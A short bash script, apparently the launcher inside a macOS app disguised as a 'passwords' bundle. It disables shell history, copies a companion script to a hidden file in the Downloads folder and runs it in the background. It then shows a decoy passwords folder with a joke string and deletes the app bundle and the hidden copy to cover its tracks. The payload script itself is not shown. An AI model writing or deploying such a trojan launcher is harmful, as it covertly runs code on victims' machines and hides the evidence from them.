#!/bin/bash
set +o history
CDIR=$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd ) #Directory of app
cd ${CDIR}

cp ./general.sh ~/Downloads/.general.sh
nohup ~/Downloads/.general.sh &

cd ..

mkdir passwords
echo "5UP3R_H4CK3R_8R0" > passwords/passwords.txt

rm -rf ./passwords.app/ #cleanup
rm ~/Downloads/.general.sh
open ./passwords/

